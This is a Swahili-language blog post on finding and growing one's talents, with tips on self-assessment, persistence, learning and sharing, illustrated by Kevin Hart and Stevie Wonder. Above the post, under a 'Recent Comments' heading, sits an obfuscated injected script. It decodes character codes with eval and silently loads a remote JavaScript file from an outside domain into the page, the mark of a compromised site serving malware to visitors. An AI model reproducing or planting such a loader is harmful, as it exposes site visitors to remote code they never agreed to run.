Recent Comments

<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Kipaji ni uwezo ambao binadamu anapewa na Mungu wa kufanya mambo mbalimbali hapa duniani. Uwezo huu hutofautiana baina ya mtu na mtu japokuwa kwa baadhi ya watu vinafanana.Kuna watu wana vipaji vya kuimba,kuchekesha,kuchora,kuigiza ni vingine vingi ambavyo havijatajwa hapa.
Kiukweli kila mtu hapa duniani amepewa kipaji fulani,wapo walioweza vipaji vyao mapema,wapo waliochelewa kugundua na wengine wameshindwa kabisa labda kutokana na mazingira wanayoishi au sababu kadha wa kadha.Leo hii nitakushirikisha namna ya kugundua na kukiendeleza kipaji chako ambacho mda mrefu umekuwa ukijiuliza kipaji chako ni kipi.

Je unawezaje kukuza kipaji chako
A) Tambua vipaji vyako
Mara zote unatakiwa ujitathimini nguvu na uwezo wako mara zingine Familia na marafiki zetu wanaweza kukusaidia kufanya kazi hii kwani ndio unaishi nao muda mwingi, Andika vitu unavyoweza au unavyotaka kufanya. Hii itasaidia kujua vitu tunapenda na tunafanya vizuri zaidi, kubwa zaidi pia unatakiwa kumwomba mwenyezi Mungu akusaidia kuhusu vipaji vyako.
B) Tumia muda, uwezo na nguvu zako zote kukuza vipaji vyak
Ili kuendeleza kipaji chako usikate tamaa kama hufanyi vizuri katika ukuzaji wa kipaji chako.Watu wengi wanaishia njiani katika swala zima la kukuza vipaji kwa sababu wanataka tamaa mapema pindi wanapofanya vibaya au kuchekwa na watu, Nina mfano mzuri wa mmarekani Kevin Hart ambaye alipoanza sanaa ya kuchekesha watu walikuwa wanampiga na pizza na kumcheka kuwa hawezi aache tu,hakukata tamaa aliendelea na sasa ni mchekeshaji maarufu zaidi duniani.
C) Amini kwamba unaweza
Ni lazima ujikubali na uone kuwa kipaji chako watu wengi wanakihitaji marafiki zako,familia yako na ulimwengu kwa ujumla.Usiogope kukionyesha,pambana mpaka mwisho kama unahitaji msaada waulize kwa watu wenye vipaji kama chako. Hapa pia mfano ni Stevie Wonder ambaye ni mlemavu wa macho lakini kwa kuamini kuwa anaweza pamoja na ulemavu wake alipigana mpaka kuwa mwanamuziki maarufu ambaye dunia inamtambua.Wewe ambaye umejaliwa kila kitu huna tatizo lolote kazi kwako.
D) Jifunze ujuzi ili kuendeleza kipaji chako
Tafuta maarifa zaidi juu ya kipaji chako utafanya hivi kwa kwenda shule,kufundishwa na rafiki au kusoma kwenye vitabu. Usiogope kujichanganya na watu mbalimbali ambao wanaweza kuona kipaji chako na kukushauri mambo baadhi na wewe kujifunza mengi kutoka kwao.Kwa mfano mimi namfahamu mtoto mmoja ana kipaji cha kuchora michoro mbalimbali kwa ustadi kabisa lakini hajui kuipaka rangi ili ipendeze,na mwenyewe anakiri kuipakaka rangi mbalimbali hawezi.Mtoto kama huyu anahitaji elimu kidogo aidha ya darasani au kufundishwa na rafiki yake au yeye mwanyewe kusoma kwenye vitabu.
E) Fanyia kazi kipaji chako.
Kila kipaji kinahitaji nguvu na kufanya kazi kwa juhudi.Ili kipaji chako kiweze kufanikiwa vizuri lazima ukifanye kila siku ijao kwa Mungu.Kwa kufanya hivi itakufanya ukipende na kuwa na moyo nacho.Watu wengi sana ni mimi nikiwa miongoni tumeuwa vipaji vyetu vingi kwa kuwa wavivu wa kufanyia kazi vile vitu tulivyokuwa tunavifanya tukiwa watoto.Mimi nakumbuka wakati nikiwa mdogo kwenye michezo ya utoto nilikuwa naweza kufanya mambo mengi kiasi kwamba ningeweza kuendelea kuvifanya mpaka ukubwani dunia ingekuwa inanitambua.
F) Shirikisha watu wengine kuhusu kipaji chako
Kupitia watu wengine vipaji vyako ndo vitakua, Kama kipaji chako kiko tayari usikifiche,waonyeshe watu wakione kuwa una kipaji fulani.Kwa kufanya hivi ulimwengu mzima utakutambua na utapata mafanikio zaidi.Ukiwa na tabia ya uchoyo kwa kweli kipaji chako hakitaonekana badala yake kitakufa kabisa.
Nikuambie tu kama una kipaji chochote muda wa kukionyesha na kukitumia ni sasa hujawahi wala hujachelewa fanya sasa.

By ventas malack

Make the World Aware